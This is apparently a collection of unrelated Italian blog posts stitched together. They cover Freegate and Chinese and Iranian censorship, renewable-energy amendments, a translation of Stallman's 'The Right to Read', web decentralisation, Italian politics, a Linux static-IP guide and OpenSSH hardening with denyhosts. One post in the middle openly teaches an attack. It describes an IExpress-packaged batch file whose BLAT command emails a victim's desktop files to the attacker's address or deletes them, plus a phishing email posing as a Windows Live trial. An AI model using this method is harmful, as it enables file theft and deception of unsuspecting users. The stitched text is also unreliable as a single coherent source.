Zhou e altri suoi compagni del Falun Gong che vivevano negli Stati Uniti costruirono un network molto assiduo ed efficace: molti di loro, come Zhou, erano ingegneri ed esperti di computer con straordinarie abilità informatiche. Crearono un’organizzazione – Global Internet Freedom Consortium – e cominciarono a ingaggiare una battaglia con la censura cinese. “Ci convincemmo a un impegno maggiore e più agguerrito nel 2001, quando vedemmo di nuovo all’opera la macchina dell’inganno che avevamo conosciuto ai tempi della strage di Tien An Men”. Nel 2001 le autorità e i mezzi di comunicazione cinesi sostennero che cinque membri del Falun Gong si erano bruciati per protesta sulla stessa piazza Tien An Men: due di loro morirono, una donna e una bambina. L’episodio fu usato per confermare il carattere di culto disumano e deviato del Falun Gong. I praticanti del Falun Gong sostengono invece che il suicidio e la violenza sono condannati dal loro movimento, e che le immagini di quell’episodio mostrano molte stranezze: che quindi non si sia trattato di una protesta di aderenti al Falun Gong, ma di un’iniziativa diversa e mai spiegata. I media internazionali se ne occuparono molto, ma l’inattendibilità delle versioni da una parte e dalla’altra ha sempre impedito di capire chi fossero davvero quelle persone. Per la campagna di discredito del Falun Gong in Cina fu comunque un grande successo, e per Zhou e i suoi amici il segno che bisognava contrattaccare. La sfida per la diffusione di informazioni online e per l’accesso ai siti di tutto il mondo sul territorio cinese ha da allora avuto un’escalation, con una svolta decisiva determinata dall’ingresso sulla scena di Bill Xia e del suo software: Freegate.
Di Bill Xia si sa molto poco. Dopo che un collaboratore del GIFC fu aggredito a casa sua, e i suoi computer furono saccheggiati, le persone del GIFC sono diventate molto attente e guardinghe, e più prudente di tutti è il creatore del programma che ha messo in crisi la censura cinese in questi ultimi due anni. Anche lui è nato in Cina e vive negli Stati Uniti, da qualche parte sulla costa est. Preferisce non incontrare i giornalisti, e ha concesso a Wired Italia un’intervista telefonica molto puntuale su Freegate e il Falun Gong, e molto evasiva su di sé, chiedendo una comprensibile discrezione.
Prima che Xia creasse Freegate, le tecniche di individuazione degli IP di bloccare e di filtro dei contenuti usate dalla censura cinese erano diventate molto elaborate ed efficaci. “Il sistema più comune e facile per aggirare i blocchi degli IP è creare dei proxy, cioè dei server che fanno da intermediari tra chi vuole raggiungere un sito bloccato e quel sito. L’utente si dirige verso l’IP del proxy, e da lì viene reindirizzato sull’IP bloccato. Il limite di questo sistema è che non è possibile comunicare a grandi numeri di utenti interessati l’indirizzo IP del proxy senza che lo vengano a sapere anche i censori, e possano così bloccare anche quello. La soluzione è un IP dinamico, ma bisogna aggiornare tempestivamente gli utenti dei nuovi indirizzi”. Freegate fa questo: è un’applicazione che pesa quanto un jpeg, che si può spedire per mail, o trasmettere via instant messenger, o scaricare dalla rete. Una volta installata, “parla” direttamente con il proxy e reindirizza su indirizzi IP che cambiano ogni secondo. Con grandi investimenti economici e tecnici, la censura cinese si è messa in guerra contro Freegate, e Freegate aggiorna le sue successive versioni per difendersi: un progetto di munire obbligatoriamente ogni nuovo computer venduto in Cina di un filtro software interno è stato per il momento sospeso. In Cina gli utenti di Freegate sono stimati oggi oltre il milione di persone.

Ed ecco la seconda manifestazione, in questa storia. È quella del 13 giugno 2009 a Teheran, subito dopo la comunicazione dei risultati elettorali che davano vincente il presidente uscente Ahmadinejad. Accusandolo di brogli, i sostenitori del suo oppositore Mousavi scesero in strada in molte città iraniane, avviando la più grande protesta pubblica dai tempi della rivoluzione che aveva cacciato lo Scià. Nelle stesse ore, il regime iraniano sospendeva l’accesso a internet per tre quarti d’ora e approntava una serie di blocchi e filtri rispetto a molti siti e servizi online internazionali.
Pochi mesi prima, il GIFC aveva diffuso in rete una versione in farsi di Freegate, ma aveva dovuto inibirne l’uso quasi subito perché l’enorme numero di utenti iraniani aveva saturato e fatto crollare i server. Il 13 giugno, però, visto quello che stava succedendo e le richieste che arrivavano, il GIFC riaprì l’uso di Freegate agli iraniani: gli oppositori di Ahmadinejad avevano preparato da mesi la conquista di spazi di comunicazione online col resto del mondo, spazi che sarebbero divenuti essenziali in quei giorni di repressione e censura. “Il numero di utenti raggiunse il milione nel giro di 20 ore. La censura iraniana è molto meno avanzata di quella cinese, e quindi la diffusione di Freegate fu molto più rapida. Fummo di nuovo costretti a sospenderlo, e successivamente lo riattivammo solo rispetto all’accesso di alcuni siti come YouTube, Twitter e Facebook”. Fu grazie a Freegate che nelle settimane successive “la rivoluzione di Twitter” potè comunicare col mondo e riceverne informazioni. Sul sito del GIFC campeggia uno degli infiniti messaggi arrivati dagli utenti iraniani: “Voglio solo dirvi che Freegate ci ha salvati, perché durante le elezioni non c’erano strade per comunicare col mondo e voi ce le avete aperte. Quindi molte grazie a voi di Freegate. Vi adoro”.

Ho fatto a Zhou e a Xia la stessa domanda, dopo che entrambi mi avevano ripetuto che né loro né il Falun Gong vogliono fare politica e che vogliono solo ottenere che i cinesi siano liberi di praticarlo alla luce del sole. “Se non ci fosse stata la repressione, non mi sarei mai imbarcato in tutto questo”, mi aveva detto Zhou. Ma non siete fieri, ho chiesto loro, che la vostra battaglia sia diventata una battaglia più grande per la libertà e la democrazia nel mondo grazie a internet? “Siamo contenti che il nostro lavoro possa aiutare anche delle altre persone”, mi hanno risposto diplomaticamente, entrambi con le stesse parole. Allora ho insistito: fatemi capire, se il Falun Gong tornasse a essere libero e legale, cosa fareste, continuereste a lavorare su Freegate e a combattere le censure nel mondo? “Tornerei a insegnare e basta, ma sono contento se Freegate potrà aiutare altre persone”, ha risposto Zhou. “Me ne andrei un po’ in vacanza”, ha detto Xia.

Leggo oggi su Repubblica gli emendamenti alla Finanziaria riguardanti le energie rinnovabili.

Se passano, siamo veramente alla frutta…

1) “rimodulazione in forte riduzione, causa l’impraticabilità dell’obbligo di dotare gli impianti di idonea capacità di accumulo, dei coefficienti di incentivazione delle fonti rinnovabili non programmabili, là dove Terna dichiara di avere difficoltà di dispacciamento”.

Detto in altre parole: come è noto le rinnovabili portano molti vantaggi, ma richiedono un adeguamento della rete di trasmissione e distribuzione. Per questo Bruxelles (Direttiva 2001/77/CE e successive) impone ai gestori delle reti “di garantire la priorità di dispacciamento alle fonti rinnovabili e di prevedere e risolvere in anticipo, attraverso le attività di idoneo sviluppo della rete, le problematiche connesse all’inserimento delle fonti rinnovabili nel sistema elettrico nazionale”. Ma in disprezzo a questo principio (e a qualsiasi logica di impegno ambientale) l’emendamento governativo chiede invece che si sviluppino nuovi impianti solo lì dove la rete è in grado di assorbirne la produzione.

2) ”riduzione drastica del valore del prezzo di riferimento del Certificato Verde che passerebbe dal prezzo medio di mercato pari a circa 85,00 €/MWh a circa 40,00 €/MWh (pari alla differenza tra 120 €/MWh e il prezzo medio dell’energia elettrica)”. In questo caso il proposito dell’emendamento è fin troppo chiaro;

3) ”invece di impegnare Terna a realizzare i necessari è già previsti piani di potenziamento delle reti, gli si attribuisce l’insindacabile potere di stabilire la massima quantità di produzione di energia elettrica da fonte rinnovabile non programmabile che può essere connessa ed erogata”. )  Una modifica che fa il paio con il punto 1 : non si fissa un obiettivo di espansione e si chiede a tutti gli attori interessati di adeguarsi, ma si delega a Terna il compito di pronunciare la parola finale su quanta energia rinnovabile si può “permettere” il Paese.

di Richard Stallman

Da La strada per Tycho, una raccolta di articoli sugli antefatti della Rivoluzione Lunare, pubblicata a Città della Luna nel 2096.

Per Dan Halbert, la strada per Tycho cominciò al college, quando Lissa Lenz gli chiese in prestito il computer. Il suo le si era rotto, e non sarebbe riuscita a completare il progetto di metà anno senza trovarne un altro in prestito. E Dan era l’unico a cui avrebbe osato chiederlo.

Dan si trovò di fronte a un dilemma. Certo, doveva aiutarla, ma se le avesse prestato il computer, lei avrebbe potuto leggere i suoi libri. A parte il fatto che lasciar leggere i propri libri a qualcuno significava rischiare diversi anni di prigione, l’idea era scioccante di per sé. Come tutti, fin da piccolo aveva imparato a scuola che condividere libri era cosa cattiva, sbagliata, una cosa da pirati.

E non c’era da illudersi di sfuggire all’APS, l’Autorità di Protezione del Software. Nel corso d’informatica Dan aveva imparato che ogni libro includeva delle sentinelle software per i diritti di copia che riportavano alla Centrale Licenze dove e quando era stato letto, e da chi; le informazioni venivano usate per identificare i pirati della lettura, ma anche a costruire profili di interessi che venivano poi rivenduti. Appena avesse connesso il suo computer in rete, la Centrale Licenze l’avrebbe scoperto e lui, come proprietario del computer, avrebbe subito la pena più dura, per la sua negligenza nel prevenire il crimine.

Naturalmente, non era detto che Lissa avesse intenzione di leggere i suoi libri. Magari voleva il suo computer solo per scrivere il suo compito. Ma Dan sapeva che Lissa veniva da una famiglia della classe media e poteva a malapena permettersi la retta della scuola, figurarsi i diritti di lettura. Leggere i suoi libri poteva anche essere l’unico modo per lei per riuscire a laurearsi. Capiva bene la situazione: lui stesso aveva dovuto indebitarsi per pagare tutti gli articoli di ricerca che aveva letto; il 10% delle tariffe andava ai ricercatori che avevano scritto gli articoli, e siccome Dan puntava alla carriera accademica, poteva sperare che i suoi stessi articoli gli avrebbero reso abbastanza da ripagare il prestito, se citati abbastanza spesso.

Più in là Dan avrebbe imparato che c’era stato un tempo in cui chiunque poteva andare in biblioteca e leggere gli articoli delle riviste, e persino i libri, senza pagare. C’erano gli studiosi indipendenti che leggevano migliaia di pagine senza i sussidi del governo per i libri. Ma negli anni ‘90, gli editori di riviste sia quelli commerciali che quelli senza fini di lucro avevano cominciato a riscuotere tariffe d’accesso. Nel 2047 ormai le biblioteche che fornivano accesso pubblico alla letteratura scientifica non erano che un pallido ricordo.

Ovviamente c’erano dei modi per aggirare la sorveglianza dell’APS e della Centrale Licenze, tutti illegali. Nel corso d’informatica Dan aveva un compagno, Frank Martucci, che si era procurato un debugger illegale, e lo usava per far saltare via il codice delle sentinelle per i diritti di copia quando leggeva i libri. Ma l’aveva raccontato troppo in giro, e uno dei suoi amici lo denunciò alla APS per intascare il compenso (era facile cadere nella tentazione di una spiata per uno studente squattrinato). Nel 2047, Frank si ritrovò in prigione, non per lettura pirata, ma per possesso di debugger.

Più tardi, Dan avrebbe appreso che c’era stato un tempo in cui chiunque poteva possedere un debugger. C’erano persino dei debugger liberi disponibili su CD o scaricabili dalla rete. Ma quando anche gli utenti comuni cominciarono ad usarli per aggirare le sentinelle per i diritti di copia, finì che un giudice sentenziò che proprio questo ne era diventato l’uso prevalente nella pratica. Significava che erano diventati illegali; gli autori di debugger furono imprigionati.

Naturalmente i programmatori continuavano ad aver bisogno dei debugger, ma nel 2047 i venditori di debugger distribuivano solo copie numerate, e solo ai programmatori regolarmente autorizzati. Il debugger che Dan aveva usato durante le lezioni di informatica era tenuto dietro una protezione speciale che lo confinava unicamente all’uso per gli esercizi in classe.

Un altro modo per eludere le sentinelle per i diritti di copia era sostituire il kernel di sistema con uno modificato, e Dan quindi arrivò ai kernel liberi, addirittura interi sistemi operativi, che erano esistiti attorno al cambio di secolo. Ma non solo erano illegali, come i debugger, ma per installarli dovevi conoscere la password primaria del tuo computer, quella più segreta di tutte, e né l’FBI né il supporto clienti della Microsoft te l’avrebbero mai svelata.

Dan si rese conto che non poteva semplicemente prestare il suo computer a Lissa. Ma come poteva rifiutarsi di aiutarla? lui la amava. Ogni volta che parlava con lei era una delizia. E lei lo aveva scelto nel chiedere aiuto, questo poteva voler dire che anche lei lo amava.

Dan risolse il dilemma facendo qualcosa di persino più impensabile, le prestò il computer e le disse la sua parola segreta. In questo modo quando Lissa avesse letto i suoi libri, la Centrale Licenze avrebbe creduto che fosse lui a leggerli. Era sempre un crimine, ma l’APS non se ne sarebbe accorta a meno che Lissa non lo denunciasse.

Naturalmente, se la scuola avesse scoperto che aveva dato la sua parola segreta a Lissa, si sarebbero subito chiusi tutti i cancelli per entrambi come studenti, indipendentemente dall’uso che lei ne avesse fatto. La politica della scuola era che qualsiasi interferenza con i loro mezzi per sorvegliare i computer degli studenti, faceva scattare un’azione disciplinare. Non importava nulla se avevi fatto qualche danno o meno, la colpa era l’aver reso più difficile agli amministratori sorvegliarti. Loro assumevano che questo voleva dire che stavi facendo qualcos’altro di proibito, senza bisogno di sapere cosa.

Gli studenti non venivano espulsi di solito per questo, non direttamente. Venivano invece banditi dai sistemi informatici della scuola, e inevitabilmente avrebbero fallito in tutti i corsi.

Più tardi Dan avrebbe imparato che una politica di questo tipo era cominciata solo negli anni ‘80, quando gli studenti universitari cominciarono in gran numero ad usare i computer. Prima le università adottavano un approccio differente alla disciplina degli studenti, punivano le attività che causavano dei danni, non quelle che sollevavano solo sospetti.

Lissa non denunciò Dan all’APS. La sua decisione di aiutarla portò al loro matrimonio, come li portò anche a mettere in dubbio quello che era stato loro insegnato da bambini sulla pirateria. I due cominciarono a leggere sulla storia dei diritti di copia, sull’Unione Sovietica e le sue restrizioni alla copia, e persino la costituzione degli Stati Uniti com’era all’origine. Si trasferirono sulla Luna, dove trovarono altri che come loro s’erano sottratti al lungo braccio dell’APS. Quando cominciò la Rivolta di Tycho nel 2062, il diritto universale a leggere ne divenne presto uno degli obiettivi centrali.

OK, è un argomento tecnico, per informatici, ma è da mesi che voglio parlare di questa cosa. E poi è una cosa che riguarda le trasformazioni del nostro modo di comunicare, in ogni caso.

Internet è una rete. Ormai lo sanno anche i bambini. Tuttavia non viene usata come rete, dalla stragrande maggioranza della gente. E come in tanti altri casi, esiste una contraddizione logica, una discrepanza tra linguaggio e significato, che tutti digeriscono in modo assolutamente indolore.

Internet è una rete di computer, senza un centro, dove il computer di ognuno di noi non è gerarchicamente inferiore ad un altro. Dove ognuno è ricevente e trasmittente, sullo stesso piano.

Ora, quando è il momento di venderlo, tutti vengono imbevuti di questa propaganda. Quando è il momento di usarlo, invece, tutti danno per scontato che su internet ci siano semplicemente dei servizi, di cui si usufruisce. Uno a molti. Esattamente come la televisione.

In questa propaganda, gioca un ruolo importante la parola “interattivo”. In realtà, interattiva è qualsiasi cosa con la quale possiamo interagire, non solo come riceventi passivi di messaggi e impulsi. Interattiva è qualsiasi cosa che a sua volta possa ricevere i nostri impulsi. Ovvero, se ci pensate, qualsiasi normale oggetto della vita quotidiana. Qualsiasi gioco, anche non elettronico.

Allora quando si pone il problema?

Innanzi tutto il problema si pone quando si tratta di informazione. Siccome l’informazione tramite stampa, radio e televisione non è mai stata interattiva, bensì è sempre stata una diffusione a senso unico, da uno a molti, da un vertice alle masse, l’idea di poter interagire con l’emittente anche solo per selezionare le informazioni desiderate, è spacciata per rivoluzione.

E improvvisamente si scopre che un sacco di cose sono interattive, che i videogiochi sono interattivi. Il computer è sempre stato interattivo. Come qualsiasi altro oggetto. Si è cominciato a dire che era interattivo quando è divenuto un media. E siccome i media non sono mai stati interattivi, questa è diventata una rivoluzione.

Ma interattivo è ancora un parola, appunto, fortemente ideologizzata. Ovvero presuppone un emittente gerarchicamente superiore, e la possibilità rivoluzionaria di interagirci. Interattivo, per esmpio, non lo diremmo mai riguardo ai rapporti umani. E’ scontato che siano interattivi, ed è scontato che siano alla pari, in termini di possibilità di risposta e interazione (ovviamente tralasciando i limiti sociali all’interazione, parlando solo di quelli tecnici).

Bene, neanche di internet si dovrebbe dire che è.. interattiva. Dovrebbe essere scontato. Internet non è la televisione, non è la radio. Su internet il computer di ognuno di noi potrebbe offrire un servizio, pubblicare, fare streaming di audio e video, trasmettere una televisione. Ospitare un mondo virtuale, un sito web, un portale, un giornale, un facebook.

L’unica limitazione tecnica che ci separa da questo è.. la banda in upload. Se io faccio un sito sul mio computer di casa e ci si collegano 20 persone, il sito è già down. Perché non ce la fa a trasmettere abbastanza velocemente a 20 persone tutti i dati.

Se voglio banda in upload, la pago salata, e se voglio un IP fisso per associarlo ad un dominio vero (come www.maramaobarabao.it), lo pago salato.

Ma che motivo c’è per cui costi poco la banda in download e tanto quella in upload? Il cavo non è lo stesso? Semplice:  mercato. La banda in uscita vale. Consente di hostare servizi. Vale soldi. Quella in entrata no, sono soldi che dò io, usufruendo di servizi, guardando pubblicità, eccetera eccetera.

Tolte queste limitazioni, il vostro computer non è diverso da un qualsiasi web server. Non è diverso da YouTube. Concettualmente non lo è. Internet non è solo “interattiva”. No, su internet non c’è proprio distinzione, tra emittente e ricevente. Attualmente ci stiamo appoggiando a servizi di hosting esterni, come youtube, come google, come facebook, per una semplice ragione. La banda in uscita non c’è. Non ancora.

Per quello tutto il nostro sistema operativo, le applicazioni, la mail, si sta replicando all’interno del browser. Per essere “interattivi”, per essere “social”, dobbiamo passare per server unici, servizi presso cui ci registriamo. Tutta l’organizzazione del sapere avviene in remoto, non sulle nostre macchine. I tag, i feed, l’xml, i profili, i file messi online, le gallerie fotografiche, la musica. In effetti trovare modi in cui organizzare questa informazione è stata una piccola rivoluzione. In effetti tecnicamente i flussi di dati sono già bidirezionali, ma finché queste informazioni non sono organizzate e utilizzabili, non valgono nulla.

Ma noi un sistema operativo ce l’abbiamo già. E ha sempre avuto sistemi di gestione della rete, delle autorizzazioni all’utilizzo dei file, di condivisione delle foto, della musica e di tutto, di gestione degli utenti, dei gruppi di autorizzazioni.

Solo che i sistemi operativi che usiamo sono strumenti tecnici, professionali, non user friendly, non social. Nessuno vuole mettere su un server di windows 2003 ed un Active Directory di tutti i propri amici con le autorizzazioni del caso.

Questi sistemi operativi si sono limitati all’utilizzo aziendale e professionale delle interazioni e delle condivisioni, per una semplice ragione: non abbiamo ancora internet. Non c’è ancora. Internet non è la banda in download, bensì la concomitanza di upload e download. Di banda in download ne abbiamo a strafottere, già guardando la televisione.

Siamo pieni, di banda in download, ci nuotiamo, ci sguazziamo, ci inondano di roba, tutto il giorno. Non se ne può più.

Ora però i sistemi operativi cominciano ad avere strumenti come la possibilità di taggare i file, aggiungere commenti, valutazioni. E cominciano a spuntare servizi social che sono ibridi, consentono di condividere direttamente cartelle del proprio computer, per generare automaticamente album fotografici, archivi di file, playlist musicali. Senza fare upload di nulla. Per esempio, Dropbox. Ovviamente attualmente l’upload, in background e invisibile, al server di dropbox viene fatta. Perché non c’è banda. Ma concettualmente è un altra cosa.

Cosa voglio dimostrare?

Il futuro non è il web 2.0. Il Web 2.0 è solo un accrocchio, una toppa. Un tentativo del web, di un sistema di visualizzazione di ipertesti, di sopperire alle mancanze dei sistemi operativi. Ora stanno rifacendo tutto nel browser, persino i giochi. La gente non conosce i giochi online 3d, che sono arrivati a livelli straordinari, ma conosce benissimo Pet Society su Facebook. Se qualcosa non avviene nel browser, sembra non avere senso per la maggioranza delle persone. E’ come se nessuno utilizzasse a pieno il proprio computer, ma ne facesse girare un altro in una macchina virtuale. E questo computer virtuale è sempre più.. bé di fatto è un computer di proprietà di Google, su cui lavoriamo. Con qualche (più di una per fortuna) eccezione.

I casi sono due allora: o i computer diventano il web, e buttiamo via windows, linux, e MacOs (almeno per le fasce non professionali di utilizzatori dei pc), e buttiamo via la vera potenza dei PC, la possibilità di utilizzarli per applicazioni di alto livello, video, musica, realtà virtuale, e torniamo indietro di 20 anni nell’evoluzione dei personal computer. O aumenta la banda in uscita.

Se aumenta la banda tipo a 100 MegaBit, tutto cambia. E avverrà qualcosa di simile a quello che è avvenuto dopo Napster, al mondo della condivisione dei file.

Prima si passava per un server. Poi si è passati al Peer to Peer. Il p2p riflette la vera natura di internet. Non c’è nessun server di mezzo, solo i nostri computer. Che per l’appunto, sono già server.

Così sarà la rete, così sarà il social network in futuro. Io avrò delle foto sul pc e deciderò con chi condividerle, con che rete. Con che persone. Pubblicherò direttamente dal mio computer. Avrò poi servizi online di backup e di accesso ai miei dati, su server più grossi.

Questo è quello che penso. Quindi nella battaglia Google-Microsoft, a lungo termine, chi vincerà? Secondo me all’aumentare della banda diventeranno sempre più centrali i sistemi operativi.

Questa è una previsione azzardata, mi rendo conto, ma a me pare così. E dirò di più, per quanto non mi piaccia il monopolio Microsoft, è auspicabile che siano i sistemi operativi (che dovranno anche diventare più liberi) il futuro, altrimenti aziende come Google controlleranno troppo, le piattaforme, i contenuti, i nostri dati. Persino la piattaforma su cui lavoriamo.

Come il caso del p2p ci insegna, invece possiamo essere liberi da queste cose, dalla centralizzazione delle informazioni, specie se è mascherata da interattività.

Personal computer, ricordiamoci che questa, è stata la rivoluzione: avere un computer personale, per la prima volta il potere di produrre informazione, progettualità, arte, pensieri, e ora di diffonderla, di pubblicarla, di venderla. Ma liberamente. Utilizzare tutti assieme un computer virtuale che sta nei server di google e pochi altri, non lo definirei rivoluzione.

Non so se questo sia stato un articolo tecnico, se lo è stato troppo me ne scuso. Io non volevo parlare di problemi tecnici per noi addetti. Si tratta dei cambiamenti nei paradigmi della comunicazione. Roba da tenere d’occhio, insomma.

E poi io non sopporto le distorsioni e l’ideologia. Ci viene detto che disponiamo di grandi mezzi, che abbiamo “l’interattività”, che vivamo nell’era di questo e di quello. La verità è che nulla è cambiato. Questa è solo l’evoluzione delle tecnologie emerse a metà del novecento. Lo shuttle è sempre lo stesso aereo di mattonelle.

Nessuno ha veramente smollato il potere.

E internet deve ancora arrivare.

non so cosa sia successo ai computer del mio ufficio. Non sono più in rete tra loro da quando ho collegato un router adsl tiscali. avrei bisogno di una mano per effetturae il ripristino delle operatività

Il web è pieno di guide, anche recenti, che spiegano come entrare in possesso del computer di un malcapitato, preso a caso o cercato nella rete. Queste sfruttano il Netbios.

NetBIOS è l’acronimo di Network Basic Input/Output System, ovvero Sistema base di Input/Output di rete. Solitamente è riferito ad un’API per comunicazioni sulla rete locale

Questo significa che teoricamente non è possibile usarlo per avere fra le cartelle condivise il disco C: di qualche vittima del cyber-spazio, perchè non supporta il routering.
Infatti, grazie ad operazione “complicate” e modifiche al registro, era possibile collegarsi ad un computer come se si trovasse nella nostra LAN, ma ormai questa guida non funziona più! Anche la guida trovata su qualche forum, datata a meno di un mese fa per esempio, è vecchi di qualche anno!

Se volete far danni o prelevare un documento da un computer o eliminarlo, dovrete scoprire l’indirizzo email della vittima e, per quel che ne so io, creare un’applicazione con IExpress, che raccoglie dei bat, ognuno dei quali invia al vostro indirizzo di posta un qualunque file, oppure lo cancella, l’unico ostacolo è che bisogna conoscerne l’ubicazione ed inserirne la directory; ad esempio, per un file sul desktop

@ BLAT C:\Users\%USERNAME%\Desktop\File.xxx -to mail@mail.com, -subject “Importante”, -try 20

%USERNAME% vale per tutti i nomi utente, questo piccolo trick ci dà una mano; a questo punto inviamo l’eseguibile da noi creato, magari camuffandolo con un po’ di social engineering, ad esempio:

Gentile Signor Pincopallino/cliente ( se ne sapete il cognome mettelo ),
Lei è stato scelto fra un campione di 45 mila utenti in questo Paese per testare le funzionalità di un nostro nuovo servizio, il quale a breve si integrerà con la suite di applicazioni di Windows Live ©

Insomma siate fantasiosi!
Se interessa, approfondiremo questo argomento (;

Mentre si discute del rapporto fra internet e opinione pubblica, e altri parlano di “blogosfera molle” (e altri ancora rispondono), in Francia c’è un villaggio dove tante cose per noi impensabili sono già realtà.

Credo che sia la prima volta nella storia di un paese civile e avanzato, che viene fatta una manifestazione, per chiedere espressamente le dimissioni del presidente del consiglio.
La cosa bella è che tutto questo movimento nasce spontaneamente dalla rete, non si tratta di propaganda politica in quanto non è presente nessun partito ufficiale come sponsor del movimento e in pochi mesi ha raggiunto più di 300.000 adesioni. E una visibilità che raggiunge anche l’estero, con alcuni quotidiani stranieri che riportano la cosa.

A questo si aggiungono anche le 335.000 firme alla lettera che Saviano, l’autore di Gomorra, ha scritto al premier. Nella lettera si chiede, in maniera del tutto pacata, l’annullamento del procedimento che porterebbe alla legge sul processo breve.

Da questi due episodi emerge chiaro e forte il disagio di una parte molto ampia di popolazione che è in serio imbarazzo per le azioni a cui il capo del governo ci mette davanti. Convinto di dover rappresentare solo la parte di elettori che lo ha votato. E forse neanche quelli, se le leggi riguardano solo lui.
Eppure dovrebbe rappresentare tutti, lo dice anche la costituzione su cui lui ha giurato. Ma l’ha letta??

Spero che il No-Berlusconi Day riesca come nelle più rosee aspettative, che se anche lui non si dimette si rende conto che è sempre più solo.

Linux Network

Quando si installa Linux e si possiede un router adsl che assegna automaticamente gli indirizzi IP, ai computer connessi alla rete locale, tramite il server DHCP tutto funziona per benino.

Si installa il SO e da subito si può navigare in rete, scaricare drivers, fare aggiornamenti e leggere la posta.

Ma se dobbiamo necessariamente far parte di una rete locale che non usa il server DHCP ma ha degli indirizzi IP statici?

Ecco quello in cui mi sono imbattuto qualche giorno fa a lavoro.

Cerca che ti ricerca sono riuscito a configurare la rete tramite terminale e ora vi riassumerò come fare.

Mettiamo ad esempio il caso che io debba configurare una rete che abbia le seguenti caratteristiche:

• IP 172.18.7.2
• Subnet Mask 255.255.255.0
• Gateway 172.18.7.1
• DNS Primario 91.188.0.5
• DNS Secondario 91.188.0.35

Innanzi tutto apriamo un terminale o shell.

Avrete bisogno di un programma per editare files. Io non riesco proprio a farmi andare giù VIM (del quale costantemente dimentico i comandi) quindi preferisco usare NANO o GEDIT (che lancia una versione grafica).

Se GEDIT non è installato sul vostro computer date il comando

sudo apt-get install gedit

 vi verrà chiesta la password di root: immettetela.

Fatto questo dobbiamo andare ad editare il file INTERFACES

Diamo quindi il comando

sudo gedit /etc/network/interfaces

 Vi si aprirà una finestra di GEDIT.

All’interno del file ci dovrà essere scritto:

auto lo

iface lo inet loopback

  

auto eth0

iface eth0 inet static

address 172.18.7.2

netmask 255.255.255.0

gateway 172.18.7.1

Le prime due righe dovrebbero già essere inserite di default. Il resto dovete aggiungerlo voi personalizzando gli indirizzi IP secondo le vostre esigenze.

Comunque tenete conto che:

1. Address è l’indirizzo che volete assegnare alla vostra macchina. Se avete più macchine l’ultimo numero sarà sempre differente.
2. Netmask è sempre quello, per tutti.
3. Gateway è l’indirizzo del router. Sarà uguale a quello della vostra macchina ma l’ultima cifra sarà uguale a 1.

SALVATE ed USCITE da Gedit!

Ora dobbiamo andare ad editare il file RESOLV.CONF

Diamo quindi il comando

sudo gedit /etc/resolv.conf

 Vi si aprirà una finestra di GEDIT.

All’interno del file ci dovrà essere scritto:

search com

nameserver 91.188.0.5

nameserver 91.188.0.35

Ogni nameserver è un indirizzo DNS. Sono scritti in ordine di priorità.

SALVATE ed USCITE da Gedit!

Adesso non resta che resettare la rete dando il comando

/etc/init.d/network restart

Tutto dovrebbe essere a posto e dovreste poter navigare in Internet.

A questo punto, però, l’icona della rete dovrebbe risultare DISCONNESSA nonostante tutto funzioni. Questo accade perché avete bypassato il network manager.

Non vi resta che disinteressarvi dell’icona o disinstallare il network manager.

Mi sarebbe piaciuto capire come configurare direttamente il network manager ma, sembrerà strano, non sono riuscito. Sarà per la prossima!

Fonti usate per l’articolo…

1. Impostare IP statico su Kubuntu
2. Linux Internetworking

Configuare OpenSSH a prova di bomba

Siamo talmente paranoici che abbiamo fatto, quasi, tutto quanto consigliato qua per rendere il nostro server con OpenSSH a prova di bomba. Per un uso casalingo io non ho impostato però nessun firewall (mi fido delle impostazioni che ho messo sul mio router netgear dg834g) cioè nessuna regola di iptables sul sistema dove è veramente installato OpenSSH server.

Fregare gli attacchi brute-force

L’unica cosa che mi scoccia sono questi essere infimi, e poco pericolosi, chiamati script-kiddies che tentano degli attacchi brute-force sulla porta 22. Non che sia una gran scocciatura ma i file di log, più precisamente i /var/log/auth.log, tendono a riempirsi paurosamente. Ho trovato una soluzione KISS usando un programma, scritto in Python, chiamato denyhosts. Il concetto è semplice: si guarda i file di log e se un determinato IP fallisce la connessione ssh lo blocca ficcandolo in /etc/hosts.deny.

Una precisazione su come funzionano /etc/hosts.allow e /etc/hosts.deny. Questi sono dei file che configurano il TCP Wrapper: una spiegazione esaustiva si trova negli Appunti di Informatica Libera di Daniele Giacomini. Riassumendo: se un IP è regolamentato da una regola in /etc/hosts.allow tutto fila liscio, se invece questo IP non è previsto in /etc/hosts.allow il sistema guarda /etc/hosts.deny. Quindi in /etc/hosts.allow, se vogliamo fare in modo che gli IP della nostra sottorete non vengano bloccati, mettiamo questa riga:

sshd: 192.168.0.0/255.255.255.248

Ovviamente questo è solo un esempio preso dalla mia configurazione. Se non sapete niente di reti e sottoreti non capirete una tega, forse potrebbe venirvi in aiuto il programma ipcalc:

ma anche Wikipedia…se non basta fatevi un corso universitario di Reti di Calcolatori o leggetevi un libro a riguardo o rompete i coglioni a un SysAdmin (non io: non lo sono!).
In /etc/hosts.deny non mettiamo nulla: se ne occuperà automaticamente denyhosts. Per esempio una riga che aggiunge denyhosts è la seguente (ovviamente l’IP bloccato è di fantasia):

# DenyHosts: Sat Nov 21 13:05:13 2009 | ALL: 123.123.123.123
ALL: 123.123.123.123

Figo no? Ora non ci resta che editare il file di configurazione di denyhosts che si trova, su Arch Linux, in /etc/denyhosts/denyhosts.cfg.

Configurazione di denyhosts.cfg

Prendo paro paro il mio file di configurazione con una spiegazione tutta mia. Le FAQ sul sito e i commenti su denyhosts.cfg sono molto esaustivi ma degli esempi in più non fanno mai male e non vi faranno sicuramente schifo (vero?). Comunque sia sto usando la versione 2.6 di denyhosts.

SECURE_LOG = /var/log/auth.log Ovviamente questo è il file che denyhosts parsa per andare a pescarsi gli IP da bannare.

HOSTS_DENY = /etc/hosts.deny In un sistema Linux è qui che ci sono le regole per il TCP Wrapper degli IP a cui è vietato l’ingresso nel sistema.

PURGE_DENY = 2d Ricordo che stiamo parlando di uso domestico, quindi abbiamo un indirizzo dinamico raggiungibile magari, con l’ausilio di dyndns come ho fatto io, con un URL www. Ma abbiamo sempre un indirizzo dinamico e ad ogni caduta di connessione (grazie Telecom) cambiamo spesso IP. Quindi gli script-kiddies non punteranno sempre a noi pensando che siamo sempre noi cambiando, magari, gli username e password. Insomma non siamo un bersaglio fisso! Quindi è inutile riempire /etc/hosts.deny di IP. Anche perché magari pure gli script-kiddies hanno IP dinamici come tutti i comuni mortali (a parte i compuer zombie ma si spera di no). Quindi è meglio ripulire /etc/hosts.deny abbastanza spesso. 2d infatti sta per 2 day: due giorni.

